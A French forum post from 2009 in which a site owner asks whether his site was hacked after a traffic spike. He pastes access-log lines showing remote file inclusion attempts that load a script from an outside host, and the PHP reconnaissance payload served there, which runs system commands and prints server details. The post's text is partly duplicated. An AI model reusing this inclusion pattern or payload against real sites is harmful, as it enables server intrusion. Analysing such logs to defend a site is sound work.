Site piraté [résolu]
Posté : 04 mars 2009, 11:36
Bonjour,
Je ne sais pa quoi mettre dans le titre, donc j'ai mis "Site piraté"
Je vous explique mon probleme, voilà j'ai prix comme hebergeur chez OVG ça fait 3 semaines 60GP, en moyenne 350 visiteurs/jours, 2 Go de trafic journalier jusqu'au 01/03/2009, je regarde régulierement le traffic de mon site (2go/J), à la date du 2 Mars j'etais à 3 Go pour le mois de mars, je regarde de nouveaux mon traffic et il m'indique que je suis à 26 Go (mardi), et aujourd'hui je reçois un mail du service technique me disant que j'ai dépasser mes 40GO (à la base 20go, j'ai du rajouter 20go suppl, car j'allais dépasser pour le mois de Fev 18/20go), actuellement j'ai un trafic de 56Go, ce qui est anormal, je répond au support technique OVH, en leur expliquant, ensuite qui me repond de suite me disant de regarder sur le fichier .log et de me dire si j'ai pas été piraté (il me dise que des personnes peuvent piratés un site et effectué des requêtes, ce qui explique l'augmentation du traffic), alors je consulte bien le fichier .log et je remarque des intrus (bizarre)
J'ai ceci comme log :
Mon site est en pseudo frame comme ceci : http://www.*******.fr/index.php?page=acceuil.php et quand je vais sur http://werkzeugweber.de/.../safe1.txt? , voilà ce qui me met :
Sinon connaissez vous du code PHP pour bien sécurisé les peudos frames ou tout simplement un site ?
Merci vous vos réponse
Cdt
Je ne sais pa quoi mettre dans le titre, donc j'ai mis "Site piraté"
Je vous explique mon probleme, voilà j'ai prix comme hebergeur chez OVG ça fait 3 semaines 60GP, en moyenne 350 visiteurs/jours, 2 Go de trafic journalier jusqu'au 01/03/2009, je regarde régulierement le traffic de mon site (2go/J), à la date du 2 Mars j'etais à 3 Go pour le mois de mars, je regarde de nouveaux mon traffic et il m'indique que je suis à 26 Go (mardi), et aujourd'hui je reçois un mail du service technique me disant que j'ai dépasser mes 40GO (à la base 20go, j'ai du rajouter 20go suppl, car j'allais dépasser pour le mois de Fev 18/20go), actuellement j'ai un trafic de 56Go, ce qui est anormal, je répond au support technique OVH, en leur expliquant, ensuite qui me repond de suite me disant de regarder sur le fichier .log et de me dire si j'ai pas été piraté (il me dise que des personnes peuvent piratés un site et effectué des requêtes, ce qui explique l'augmentation du traffic), alors je consulte bien le fichier .log et je remarque des intrus (bizarre)
J'ai ceci comme log :
Code : Tout sélectionner
gate.xl.pt www.******.fr - [04/Mar/2009:05:42:29 +0100] "GET /index.php?page=download_adhan/index.php?page=http://werkzeugweber.de/.../safe1.txt? HTTP/1.1" 200 129400 "-" "libwww-perl/5.79"
------------------------------------------------------------
gate.xl.pt www.******.fr - [04/Mar/2009:05:42:30 +0100] "GET /index.php?page=http://werkzeugweber.de/.../safe1.txt? HTTP/1.1" 200 129612 "-" "libwww-perl/5.79"
-------------------------------------------------------------
gate.xl.pt www.******.fr - [04/Mar/2009:08:46:29 +0100] "GET /index.php?page=http://werkzeugweber.de/.../safe1.txt? HTTP/1.1" 200 129382 "-" "libwww-perl/5.79"
-----------------------------------------------------------------<?
echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "0wnW4y<br>";
exit;
?>
Est ce que j'ai été piraté selon vous , ce qui fait que mon traffic augmente ?Sinon connaissez vous du code PHP pour bien sécurisé les peudos frames ou tout simplement un site ?
Merci vous vos réponse
Cdt